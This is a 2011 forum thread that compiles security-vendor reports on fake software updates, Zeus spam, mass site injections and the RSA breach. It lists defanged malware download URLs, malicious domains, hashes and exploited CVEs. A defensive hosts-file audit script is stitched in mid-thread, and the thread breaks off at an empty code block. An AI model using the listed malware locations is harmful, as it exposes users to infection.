July 20, 2011 - "... During this period, Web-based threats continued to grow more sophisticated. However, email threats such as spam decreased markedly following the takedown of major spam operations. Key Points:
• Many of the vulnerabilities targeted today are found in the Adobe and Java platforms. This highlights the fact that these applications often remain unpatched. Organizations and individuals should ensure that these software applications are patched promptly.
• Although spam volumes have declined since the closure of Spamit.com and takedown of the Rustock botnet, spam remains a problem for most organizations. The volume of malicious spam has returned to previous levels. Attackers continue to craft more legitimate looking messages in order to coax users into executing malicious files.
• Cybercriminals continue to experiment with combined attacks, evidenced by the recent spate of “spear-phishing” (targeted attacks that used Microsoft Office document files with embedded shockwave files that exploit vulnerabilities in Adobe Flash).
• There has been an increase in phishing attacks that include an HTML attachment, which is used to bypass anti-spam and anti-phishing filters in the browser.
• Facebook scams surged in the first half of 2011, as cybercriminals experimented with different ways to dupe social networkers into helping them earn a profit. One scam led users to trojans and fake anti-virus software for the Mac..."
(More detail in the PDF at the URL above.)


2011-07-21, 20:43

Fake Java Update uses victim PC's in DDoS...
- http://www.malwarecity.com/blog/fake-java-update-uses-your-pc-in-ddos-offensive-1113.html
20 July 2011 - "Software patches, allegedly missing codecs and Flash Player or Java updates have been quite often used as baits in order to lure computer users into installing malware. We have recently come across this type of malware dissembling as a regular update to the Java platform. Closer investigation on the file revealed more than meets the eye: a carefully-crafted piece of malware that is extremely viral (i.e. spreads using an array of media) and can be used as a powerful tool to initiate distributed denial-of-service attacks. This e-threat seems to be in-sync with the canvas of on-line attacks we’ve been witnessing lately, especially those attributed to the independent hacktivist groups, such as Anonymous or their spin-off (and now defunct) organization called LulzSec. Both groups made a habit of targeting a wide range of institutions, including companies and government organizations not as much for money but as part of their “Antisec” credo. Backdoor.IRCBot.ADEQ is a Trojan disguised as a Java update. It is extremely “contagious”, as it can be downloaded from a multitude of locations, most of them being legit websites that have been infected by the tool... Backdoor.IRCBot.ADEQ uses private messages in order to communicate with its master, who sends the bot an assortment of commands, including the URL of a particular website the malware needs to flood... On top of that, the bot proceeds to uninstall other bots such as Cerberus, Blackshades, CyberGate, or OrgeneraL DDoS Bot Cryptosuite if found injected into winlogon.exe, csrss.exe and services.exe. This is an essential step for the bot to ensure that the user doesn’t suspect any malicious activity on the computer, as well as to ensure that all the other pieces of malware racing for network bandwidth won’t get it. Plus, the bot also tries to prevent the user from noticing that the Trojan is constantly sending data to the Internet.
It successfully adds itself to the list of authorized applications in the Windows Firewall, and tries to kill firewall alerts issued by antivirus solutions when they pop up. This makes Backdoor.IRCBot.ADEQ an efficient DDoS tool to be used by an attacker to take down sites or hinder the activity of a particular company... In the recent security landscape, Anonymous and LulzSec have launched a couple of DDoS attacks against high-profile institutions. While the open-source Low-Orbit Ion Cannon tools have played a role in orchestrating the incident, most of the power was provided by botnets, as most permanent members of the organization “herd” botnets ranging between 5 and 30,000 infected machines. Botnets are universal tools of trade... A company might also get blackmailed and asked to pay a specific amount of money, or their servers will automatically be flooded with connection requests which it will be unable to answer, causing it to collapse. In the meanwhile, the company loses potential customers and, implicitly, money."

Hat-tip to cnm @ spywareinfoforum.com for the link...


2011-07-22, 20:27

Fake Flash updates...
- http://sunbeltblog.blogspot.com/2011/07/correct-version-aversion.html
July 22, 2011 - "... they're hoping the victims they attract to a scam like this won't pay much attention to what they're clicking on, never mind confirm that the Flash numbering offered matches up with reality. We detect this as VirTool.Win32.Obfuscator.hg!b1 (v), another 2GCash clickfraud Trojan**, and the VirusTotal score is currently at 5/43*."
* http://www.virustotal.com/file-scan/report.html?id=ef8f8dc5bde18e428e9cef1b1293e13f93bf513688631102bab3b07287ccaa77-1311346336
File name: install.52078.exe
Submission date: 2011-07-22 14:52:16 (UTC)
Result: 5/43 (11.6%)

** http://sunbeltblog.blogspot.com/2011/07/update-center-targets-chrome-and.html


2011-07-26, 14:23

Google AdWords phishing attack...
- http://nakedsecurity.sophos.com/2011/07/26/google-adwords-phishing-attack-strikes-inboxes/
July 26, 2011 - "Have you received an email from Google saying that your Google AdWords campaign may have stopped running?... The messages have been spammed out across the internet, attempting to trick users into visiting a bogus website that pretends to be the Google AdWords login page... It's a realistic replica of the main Google AdWords page, created with some care in an attempt to phish your credentials off you. And don't forget, your same username and password will be not just used by Google AdWords, but also Gmail, Google Docs, Google+ and so forth... In short, your Google username and password are a very attractive commodity to phishers..." (from google-oa .net) That's certainly not Google, and the fact that the domain has only just been registered makes it even more suspicious..."


2011-07-27, 00:04

Mass injection - willysy .com...
- http://www.malwaredomains.com/wordpress/?p=1956
July 26th, 2011 - "Armorize reports* on a mass injection of 90,000 infected pages (not sites). The injected iframe points to willysy .com. We’ll be adding those domains on tonight’s update, but please read the article and take immediate action if you can."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html


2011-07-27, 14:37

SpyEye's target list - US, UK, Canada, Germany, and Australia now on top
- http://www.trusteer.com/blog/us-uk-canada-germany-and-australia-now-top-spyeyes-target-list
July 26, 2011 - "Research findings from the Trusteer Situation Room and our anomaly detection service Pinpoint indicate that the number of financial institutions targeted by the SpyEye Trojan is growing. In parallel with this, our risk analysis teams have also observed an increase in the number of countries where financial institutions are being targeted by fraudsters using SpyEye. Analyzing the SpyEye command and control centers that our risk analysis team reviews every month revealed that 60% of the SpyEye bots target financial institutions in the US. This is followed by the UK with 53%, Canada with 31%, Germany 29%, and Australia 20%... the percentage of SpyEye bots targeting Canadian banks has more than doubled from 14% in May to 31% in June... SpyEye continues to expand its “hit list”... SpyEye developers appear to have figured out how these defenses operate and are now constantly trying to ensure their code activity flies under the radar of these detection systems. SpyEye seems to follow Agile software development practices, namely it is flexibly and simply coded, and new configurations are being rolled out as quickly as possible by its developers. At certain times, we have even seen two new versions of the malware released every week... A new version means that the program code itself has been modified, while a new variant is just new packing around the same code... early versions of the malware included a feature to remove Zeus from an infected host machine. This feature was, of course, in place to ensure that SpyEye is the only financial malware on the infected computer..."

SpyEye Tracker
- https://spyeyetracker.abuse.ch/
"... quick statistics about the SpyEye Trojan:
SpyEye C&C servers tracked: 381
SpyEye C&C servers online: 184
SpyEye C&C server with files online: 38
• Average SpyEye binary Antivirus detection: 26.14% ..."

ZeuS Tracker
- https://zeustracker.abuse.ch/
"... quick statistics about the ZeuS crimeware:
ZeuS C&C servers tracked: 659
ZeuS C&C servers online: 223
ZeuS C&C servers with files online: 53
ZeuS FakeURLs tracked: 19
ZeuS FakeURLs online: 6
• Average ZeuS binary Antivirus detection rate: 38.67% ..."

(... as of 2011.08.04)


2011-07-29, 13:18

SPAM/fraud aimed at credit card users...
- http://community.websense.com/blogs/securitylabs/archive/2011/07/28/has-my-credit-card-really-been-compromised.aspx
28 Jul 2011 - "Websense... has been monitoring and tracking a recent wave of email attacks being spread and aimed at credit card users and holders. The attack comes in the form of a short email with fairly detailed text alerting the recipient that their credit card has been blocked, and that they should open the attached file to find out more. The format seems old, with the content and attached file properties being the distinctive factor. With the recent attacks and data breaches of organizations in the press, this seems to be worth the buzz as personal details and credit card details were part of the information leaked... There is less the wording within the message body and the header information with regards to sender address or connecting IP's which are listed in this blog post*... The file is also VM-Aware, as the resulting execution of a download for fake AV only works if host based analysis is used (as opposed to a guest virtual machine)..."
* http://garwarner.blogspot.com/2011/07/mastercard-spam-leads-to-fake-av.html

- http://labs.m86security.com/2011/07/malicious-hotel-transaction-spam/
July 29, 2011

>> http://tools.cisco.com/security/center/viewAlert.x?alertId=23741
July 29, 2011

Sophisticated injection abuses the Twitter trend service
- http://community.websense.com/blogs/securitylabs/archive/2011/07/27/sophisticated-injection-abuse-twitter-trend-service.aspx
27 Jul 2011 - "... Websense... has detected a mass injection campaign that has infected more than 10,000 Web sites. What is surprising is the size of injected code; it’s very big – over 6,000 kbs. Surely such a large injection code can contain a lot of malicious content. The attacker used 5 layers of obfuscated methods to conceal the final redirect code. The redirect target is determined based on Twitter trend services... The redirect target is different every day, and even different at day and at night... The URL redirects customers to the Blackhole Exploit Kit where a rogue AV application will be installed. Below are IP addresses that host the Blackhole Exploit Kit. ..."


2011-07-29, 15:15

Zeus SPAM continues...
- http://garwarner.blogspot.com/2011/07/government-related-zeus-spam-continues.html
Update: New Zeus distribution site, July 29th AM:
"We are receiving SPAM emails this morning from "nacha .org" From: addresses that direct us to this Zeus distribution site.
hxxp ://federalreserve-alert .com/transaction_report.pdf.exe
... VirusTotal report... (5 of 43) detections. Only 2 of those are calling this Zeus."
July 28, 2011 - "... new example of this capability in the form of the two most recent installments of a long-running "government-related" Zeus campaign.
One of the two spammed destinations is:
alert-irs .com /00000700973770US.exe MD5 = 0691a4856713edc97664e60db735747c
This malware is currently showing a (12 of 43) detection rate at VirusTotal...
The other spammed destination is:
fdic-updates .com .com /system_update_07_28.exe MD5 = 7a0303fdb809ac0c1a84123b106992c2
This malware is currently showing a (8 of 43) detection rate at VirusTotal...
Both files are 172,032 bytes in size, but currently the FDIC one is showing a dramatically wider distribution via email than the IRS one, which may be an indication of "targeting" by the latter.
The FDIC version has been seen almost 500 times, despite the fact that the campaign is less than 45 minutes old as of this writing..."
(Much more detail at the garwarner.blogspot URL above.)

> http://www.cis.uab.edu/forensics/


2011-08-01, 14:41

willysy .com mass injection... more than 3.8 million pages
- http://blog.armorize.com/2011/07/willysycom-mass-injection-has-hit-more.html
7.31.2011 - "... As of July 31st, Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages. Note this number is for individual infected pages, -not- sites or domains. And so we've largely updated and reformatted (so new info appears at the front) the initial report*, adding to it the infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html
"... 5. Browser exploits used:
CVE-2010-0840 - Java Trust
CVE-2010-0188 - PDF LibTiff
CVE-2010-0886 - Java SMB
CVE-2006-0003 - IE MDAC
CVE-2010-1885 - HCP
6. Exploit domain:
arhyv .ru, counv .ru ...
IP: (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv .ru, vntum .ru
7. Malware URL:
hxxp :// /9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot ..."

- http://www.google.com/safebrowsing/diagnostic?site=AS:51632
"... last time suspicious content was found was on 2011-08-01..."


2011-08-02, 01:14

Fake Flash for Mac ...
- http://www.f-secure.com/weblog/archives/00002206.html
August 1, 2011 - "We've come across a fake FlashPlayer.pkg installer for Mac... Once installed, the trojan adds entries to the hosts file to hijack users visiting various Google sites (e.g., Google.com.tw, Google.com.tl, et cetera) to the IP address, which is located in the Netherlands. The server at the IP address displays a fake webpage designed to appear similar to the legitimate Google site... Even though the page looks fairly realistic, clicking on any of the links does not take the user to any other sites. Clicking on the links does however open new pop-up pages, which are all pulled from a separate remote server... At the time of writing, the pop-up pages aren't displaying anything, though we presume they are ads of some sort. It appears that the remote server serving the pop-up pages is down. The other remote server returning fake search requests appears to be still active. We detect this trojan as Trojan:BASH/QHost.WB."
(Screenshots available at the f-secure URL above.)
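The hosts-file hijack described in the F-Secure post above is easy to audit for. The following is an added example, not code from F-Secure or the forum: it parses hosts-file text and flags lines that pin a watched brand (here, any "google" label) or that send a multi-label public name to a non-local address. The sample file, the watched-label set and the local-network list are assumptions for the example; the documentation-range addresses stand in for the redacted hijack IP.

```python
import ipaddress

# Constructed sample of a tampered hosts file (not a real capture). The
# documentation addresses 203.0.113.10 / 198.51.100.7 stand in for the
# public IPs a real hijack would use.
SAMPLE_HOSTS = """\
##
# Host Database
127.0.0.1       localhost
255.255.255.255 broadcasthost
::1             localhost
203.0.113.10    google.com.tw www.google.com.tw   # injected by the trojan
203.0.113.10    google.com.tl www.google.com.tl
192.168.1.20    build-server.internal
198.51.100.7    login.examplebank.test
"""

# Domain labels that should never be pinned in a hosts file on a normal machine.
WATCHED_LABELS = {"google"}

# Address ranges a hosts file legitimately maps names to. Note that the
# ipaddress module's is_private also covers the documentation ranges used
# above, which is why this list is explicit rather than relying on is_private.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "255.255.255.255/32", "224.0.0.0/4",
    "::1/128", "::/128", "fe80::/10", "fc00::/7")]


def parse_hosts(text):
    """Return (line_no, ip, hostname) for every mapping; comments/blanks skipped."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # malformed line, not a mapping
        for host in fields[1:]:
            entries.append((line_no, ip, host.lower()))
    return entries


def is_local_address(ip):
    """True for loopback, RFC 1918, link-local, broadcast and similar ranges."""
    return any(ip in net for net in LOCAL_NETS)


def suspicious_entries(text, watched=WATCHED_LABELS):
    """Flag lines that pin a watched brand, or map a public name to a public IP."""
    findings = []
    for line_no, ip, host in parse_hosts(text):
        labels = set(host.split("."))
        if watched & labels:
            findings.append((line_no, host, str(ip), "watched domain pinned in hosts file"))
        elif "." in host and not is_local_address(ip):
            findings.append((line_no, host, str(ip), "public name mapped to public address"))
    return findings


if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print("line %d: %s -> %s (%s)" % finding)
```

On a real machine, read the text from /etc/hosts (or %SystemRoot%\System32\drivers\etc\hosts on Windows) instead of the constructed sample.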


2011-08-02, 13:45

'Work from home' SPAM scam floods Twitter
- http://nakedsecurity.sophos.com/2011/08/01/compromised-twitter-accounts-spam-out-money-making-adverts/
August 1, 2011 - "Compromised Twitter accounts are once again being used by criminals to spam out adverts to unsuspecting users. In the latest attack, Direct Messages (DMs) have been sent between Twitter users promoting a "make money fast" website... Clicking on the link takes the unsuspecting recipient to a website which claims, in breathless tones, to help single mothers and teenagers to make "thousands of dollars" every day... The likelihood is, however, that all that will happen is that you end up out of pocket if you invest in the site's Home Wealth Formula. Interestingly, the website tries to attempt to customise its content to appear more attractive to you. For instance, I visited the site from Sophos's British HQ in Abingdon, Oxfordshire, and the website duly described itself as the "Abingdon Business Journal" (no such publication really exists)... there will no doubt be Twitter users who trust DMs sent to them by their friends and may click on the link, and some of them may be tempted to sign-up for the scheme...
Update: ... SPAM messages are also being sent as classic messages, not just DMs..."
(Screenshots available at the Sophos URL above.)


2011-08-03, 11:46

Cisco 2Q11 Global Threat Report
- http://blogs.cisco.com/security/cisco-2q11-global-threat-report/
August 1, 2011 - "... highlights from the Cisco 2Q11 Global Threat Report* include:
• A more than double increase in unique Web malware in the second quarter;
• Average encounter rates per enterprise peaked in March (455) and April (453);
• Companies with 5,001-10,000 employees and companies with 25,000+ employees experienced significantly higher Web malware encounters compared to other size segments;
• Brute force SQL login attempts increased significantly during the second quarter, coinciding with increased reports of SQL injection attacks throughout the period;
• Denial of Service attempts also increased during the second quarter and were observable in IPS logs;
• Global spam volumes remained fairly steady throughout the first half of 2011, while phishing increased in 2Q11, peaking at 4% of total volume in May 2011..."
* http://www.cisco.com/go/securityreport


2011-08-04, 20:27

Rapid relief for osCommerce administrators...
- http://h-online.com/-1324235
17 August 2011

willysy osCommerce now over 6M infected pages - Mass Injection ongoing...
- http://blog.armorize.com/2011/08/willysy-oscommerce-injection-over-6.html
8.03.2011 - "... With the number of infected pages now over 6 million, we've again updated our initial report on this willysy mass injection incident*..."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

- http://www.youtube.com/watch?v=1Jh_H4qQzqo
Uploaded by ArmorizeTech on Aug 3, 2011
"... recorded when infection number reached 6 million pages..."

Is That a Virus in Your Shopping Cart?
- https://krebsonsecurity.com/2011/08/is-that-a-virus-in-your-shopping-cart/
August 5, 2011

- http://h-online.com/-1317410
3 August 2011
- http://h-online.com/-1323427
16 August 2011

- http://www.usatoday.com/money/industries/technology/2011-08-11-mass-website-hacking_n.htm
"... A single criminal gang using computer servers located in the Ukraine is responsible for the latest twist in converting legit web sites into delivery mechanisms for 'driveby downloads'..."


2011-08-04, 21:43

HTran and APT ...
- http://www.secureworks.com/research/threats/htran/
August 3, 2011 - "... 'not surprising that hackers using a Chinese hacking tool might be operating from IP addresses in the PRC. Most of the Chinese destination IPs belong to large ISPs, making further attribution of the hacking activity difficult or impossible without the cooperation of the PRC government.
Conclusion: Over the past ten years, we have seen dozens of families of trojans that have been implicated in the theft of documents, email and computer source code from governments, industry and activists. Typically when hacking or malware traffic is reported on the Internet, the location of the source IP is not a reliable indicator of the true origin of the activity, due to the wide variety of programs designed to tunnel IP traffic through other computers. However, occasionally we get a chance to peek behind the curtain, either by advanced analysis of the traffic and/or its contents, or due to simple programmer/user error. This is one of those cases where we were lucky enough to observe a transient event that showed a deliberate attempt to hide the true origin of an APT. This particular hole in the operational security of a certain group of APT actors may soon be closed, however it is impossible for them to erase the evidence gathered before that time. It is our hope that every institution potentially impacted by APT activity will make haste to search out signs of this activity for themselves before the window of opportunity closes."
(More detail at the secureworks URL above.)

- https://www.computerworld.com/s/article/9218857/Researcher_follows_RSA_hacking_trail_to_China
August 4, 2011 - "... attackers gained access to RSA's network by convincing a small number of the company's employees to open malware-infected Excel spreadsheets. The spreadsheets included an exploit for a then-unpatched vulnerability in Adobe's Flash Player. Later attacks on the defense contractor Lockheed reportedly utilized information obtained in the RSA hack... Joe Stewart uncovered the location of the malware's command servers by using error messages displayed by a popular tool called "HTran," which Chinese hackers often bundle with their code. HTran bounces traffic between multiple IP addresses to mask the real identity of the order-giving servers, making it appear, for instance, that the C&C servers are in the U.S. when they are not... more than 60 malware families he's found that were custom-made for RSA-style attacks..."


2011-08-06, 13:09

Malware variants turn UAC off ...
- https://blogs.technet.com/b/mmpc/archive/2011/08/03/uac-plays-defense-against-malware.aspx
3 Aug 2011 - "... more and more malware opening a new front and turning UAC off itself. Malware does this to prevent users from seeing UAC prompts on every reboot for their payloads. The Sality virus family, Alureon rootkits, Rogue antivirus like FakePAV, Autorun worms, and the Bancos banking Trojans all have variants turning UAC off. So many are doing this that Microsoft Security Essentials, Windows Intune, and Forefront Endpoint Protection now use behavior monitoring to find software that manipulates UAC settings, and the MMPC is finding brand new malware disabling UAC regularly. The key factor here is that for malware to successfully turn UAC off, the malware must itself be elevated to run as administrator. This elevation either requires an exploit in a service with administrator access, UAC to already be turned off, or a user clicking "OK" on a UAC prompt to allow the malware to elevate. Unfortunately, many Windows users have disabled UAC. While malware was mostly avoiding UAC altogether, legitimate software was also being rewritten to not require elevation prompts, so there are fewer UAC prompts than ever to wrangle, which should make it easier to spot any suspicious activity... UAC is not intended as malware protection, but it's another layer of security to help improve the safety of Windows. If you've been attacked by malware, please check the UAC setting in the control panel to see if it's been tampered with*..."
* http://windows.microsoft.com/en-US/windows-vista/Turn-User-Account-Control-on-or-off


2011-08-08, 13:08

Fake Firefox update email...
- http://nakedsecurity.sophos.com/2011/08/08/fake-firefox-update-email-malware/
August 8, 2011 - "... email which was spammed out this weekend pretending to be an advisory about a new update to the popular Firefox web browser... no surprises here. The link downloads an executable file, which bundles together an installer for Mozilla Firefox 5.0.1 -and- a password-stealing Trojan horse. Sophos already detected the Trojan horse as Troj/PWS-BSF... Firefox automatically updates itself - so you should never have to act upon an email like this. If you want to manually look for the latest update, simply open Firefox and go to the Help menu and select About Firefox..."


2011-08-11, 13:42

LinkedIn box to Uncheck...
- https://brandimpact.wordpress.com/2011/08/10/a-box-you-want-to-uncheck-on-linkedin/
August 10, 2011 - "Apparently, LinkedIn has recently done us the “favor” of having a default setting whereby our names and photos can be used for third-party advertising. A friend forwarded me this alert (from a friend, from a friend…) this morning. Devious. And I expect that you, like me, don’t want to participate... graphic shows you how to Uncheck The Box*... Nice try, LinkedIn. But, no thanks!
*UPDATE: After you finish with Account, check the new default settings under E-mail Preferences (such as Partner InMails); and Groups, Companies & Applications (such as Data Sharing with 3rd-party applications). It’s a Facebook deja vu!
* https://brandimpact.files.wordpress.com/2011/08/linkedin_social.png

> http://www.theregister.co.uk/2011/08/11/linkedin_privacy_stuff_up/

:sad: :fear: :rolleyes:

2011-08-12, 18:57

Zeus SPAM campaign...
- http://blogs.appriver.com/blog/digital-degenerate/zeus-works-the-tax-angle
August 10, 2011 - "The past couple of days we have been seeing a fairly large Zeus-laden campaign hitting our filters. These emails are also taking on a few different personas, the majority of which being the Internal Revenue Service. The other two, to a lesser extent, are the Federal Reserve, and the Nacha Electronic Payments Association which is a non-profit group that provides the rules and regulations for electronic transactions such as insurance premiums and mortgage loans. The group claims to have one of the largest and safest payment systems in the world. This may be true, but these imposters are anything but... Zeus is currently the most frequently seen piece of malware circulating through the interwebs. It works its way onto victim machines, and installs malicious software that siphons off bank account credentials. In this campaign in particular we have seen over 1 million pieces of these caught in our filters, at an average rate of around 1 every 2 seconds. Each of the emails contains a link to a remotely hosted file. The domains on which they're hosted are: irs-report-file .com, nacha-transactions .com, irs-tax-reports .com, federal-taxes .us, irs-alerts-report .com, federalresrve .com, files-irs-pdf .com, nacha-files .com, and nacha-security .com. The filenames vary depending on the facade being used. These include: wire-report.pdf.exe, your-tax-report.pdf.exe, 00000700955060US.pdf.exe, alert-report.pdf.exe, tax_00077034772.pdf.exe, transaction_report.pdf.exe, and 3029230818209.pdf.exe..."
(Screenshots available at the appriver URL above.)


2011-08-15, 20:18

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 15, 2011

> http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Website Profile Inquiry E-mail Msg...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23906
Misleading Tourism E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23905
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
Fake Blocked Credit Card Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23820


2011-08-18, 04:40

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 17, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Parcel Delivery Failure Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23917
Fake Digital Telegram Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23946
Fake Invoice Payment Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23915
Fake Mobile Communication E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23916
Fake Traffic Ticket E-mail Msgs... *
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23945
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
Fake Antivirus Update E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23931
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588

- http://nakedsecurity.sophos.com/2011/08/18/trojans-spammed-out-in-malicious-wave-of-fake-dhl-emails/
August 18, 2011

* http://sunbeltblog.blogspot.com/2011/08/of-spam-and-speeding.html
August 18, 2011

* http://nakedsecurity.sophos.com/2011/08/17/uniform-traffic-ticket-malware-attack-widely-spammed-out/
August 17, 2011

- http://nakedsecurity.sophos.com/2011/08/15/malware-email-blocked-credit-card/
August 15, 2011

Malicious SPAM volume chart - last 28 days
- http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5226.S4.png
18 Aug 2011


2011-08-18, 16:11

Mass compromise ongoing, spreads fake antivirus
- http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html
8.17.2011 - "On August 14, we started to see mass compromise of websites to inject malicious iframes that spread fake antivirus malware. The attack is ongoing... We estimate at least 22,400 unique DOMAINS. The attackers' first attempt was not successful and therefore Google indexed more than 536,000 infected pages. However, since then the attackers have fixed the injected pattern and therefore the injected script is executed rather than displayed. Google therefore does not index infected websites any longer...
4. Browser Exploitation: Drive-by download script served by a modified version of the BlackHole exploit pack.
5. Malware: Fake antivirus, different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.
6. Injection method: Primarily via stolen FTP credentials, and then use automated program to FTP, retrieve files, inject iframe, and upload back. FTP credentials are stolen from personal Windows computers that have been infected with malware. Malware searches stored password files of FTP clients and also sniffs the FTP traffic. Stolen credentials are sent back to the attackers.
7. Malicious domains and IPs... (shown/listed at the armorize.com URL above.)
8. Antivirus detection rate: Currently 5 out of 43 on VirusTotal*..."
* https://www.virustotal.com/file-scan/report.html?id=a1bd3278d34d8484ef89dd679c5e2e241c18feebdc11cde042fc7ce1c325b061-1313382824
File name: contacts.exe_
Submission date: 2011-08-15 04:33:44 (UTC)
Result: 5/43 (11.6%)


2011-08-19, 00:57

Google report - 4 years of experience in malware detection
- http://h-online.com/-1325798
18 August 2011 - "Google has announced* the publication of a technical report entitled "Trends in Circumventing Web-Malware Detection". This report describes the results of analysing four years of data – from 160 million web pages hosted on approximately eight million sites – collected through the company's Safe Browsing initiative. The report comments that "Like other service providers, we are engaged in an arms race with malware distributors", and that each day Google issues around three million malware warnings to over four hundred million users that use browsers supporting the Safe Browsing API. The report looks into the four most commonly employed methods for detecting malware: virtual machine client honeypots, browser emulator client honeypots, classification based on domain reputation, and anti-virus engines and trends in how well they work in practice..."
* http://googleonlinesecurity.blogspot.com/2011/08/four-years-of-web-malware.html

See also:
- http://h-online.com/-1155534

- http://h-online.com/-986087

- http://www.darkreading.com/taxonomy/index/printarticle/id/231500264
Aug 18, 2011

:fear: :fear:

2011-08-20, 19:20

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 20, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Security Update Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23971
Malicious Images Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23970
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
August 19, 2011

Malware-laden spam jumps to 24 percent of all spam this week
- http://www.darkreading.com/taxonomy/index/printarticle/id/231500190
Aug 18, 2011

- http://labs.m86security.com/2011/08/massive-rise-in-malicious-spam/
August 16, 2011 - "... The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors..."
- http://labs.m86security.com/wp-content/uploads/2011/08/spammedmalware31.png


2011-08-23, 15:31

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
Updated: August 26, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Facebook Photo Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23974
Fake Traffic Violation Ticket E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23982
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588

m86 Spam Volume Index
- https://www.m86security.com/images/trace/302/302-16-SVI_time.gif
"... representative sample of the honeypot domains that we monitor."


2011-08-27, 05:25

RSA hack file found...
- http://www.f-secure.com/weblog/archives/00002226.html
August 26, 2011 - "... the hackers broke into RSA with a targeted email attack. They planted a backdoor and eventually were able to gain access to SecurID information that enabled them to go back to their original targets and successfully break into there... we knew that the attack was launched with a targeted email to EMC employees (EMC owns RSA), and that the email contained an attachment called "2011 Recruitment plan.xls". RSA disclosed this information in their blog post... we had the original email. Turns out somebody (most likely an EMC/RSA employee) had uploaded the email and attachment to the Virustotal online scanning service on 19th of March. And, as stated in the Virustotal terms, the uploaded files will be shared to relevant parties in the anti-malware and security industry. So, we all had the file already. We just didn't know we did, and we couldn't find it amongst the millions of other samples... It was an email that was spoofed to look like it was coming from recruiting website Beyond.com. It had the subject "2011 Recruitment plan" and one line of content:
"I forward this file to you for review. Please open and view it".
The message** was sent to one EMC employee and cc'd to three others... The embedded flash object shows up as a [X] symbol in the spreadsheet. The Flash object is executed by Excel (why the heck does Excel support embedded Flash is a great question). Flash object then uses the CVE-2011-0609*** vulnerability to execute code and to drop a Poison Ivy backdoor to the system. The exploit code then closes Excel and the infection is over. After this, Poison Ivy connects back to its server at good.mincesur .com. The domain mincesur .com has been used in similar espionage attacks over an extended period of time... Once the connection is made, the attacker has full remote access to the infected workstation. Even worse, it has full access to network drives that the user can access. Apparently the attackers were able to leverage this vector further until they gained access to the critical SecurID data they were looking for. The attack email does not look too complicated. In fact, it's very simple. However, the exploit -inside- Excel was a zero-day at the time and RSA could not have protected against it by patching their systems..."
* http://blogs.rsa.com/rivner/anatomy-of-an-attack/

** http://www.f-secure.com/weblog/archives/sra2011_1.png

*** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0609
Last revised: 04/21/2011
CVSS v2 Base Score: 9.3 (HIGH)
(-before- Flash Player - see:
- https://www.adobe.com/support/security/advisories/apsa11-01.html March 14, 2011)
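The RSA lure above was an Excel file carrying an embedded Flash object. An added example (mine, not code from the F-Secure or RSA write-ups) that a practitioner could run over quarantined attachments: it looks for the SWF header signature ("FWS"/"CWS"/"ZWS", one version byte, four-byte little-endian length) inside legacy OLE2 binaries and inside the members of zipped OOXML files. The sample .xlsx is constructed in memory; the member name xl/embeddings/oleObject1.bin is where OOXML keeps embedded OLE objects, while the version range and the fake OLE2 container around the SWF are assumptions of this example, not anything the articles state.

```python
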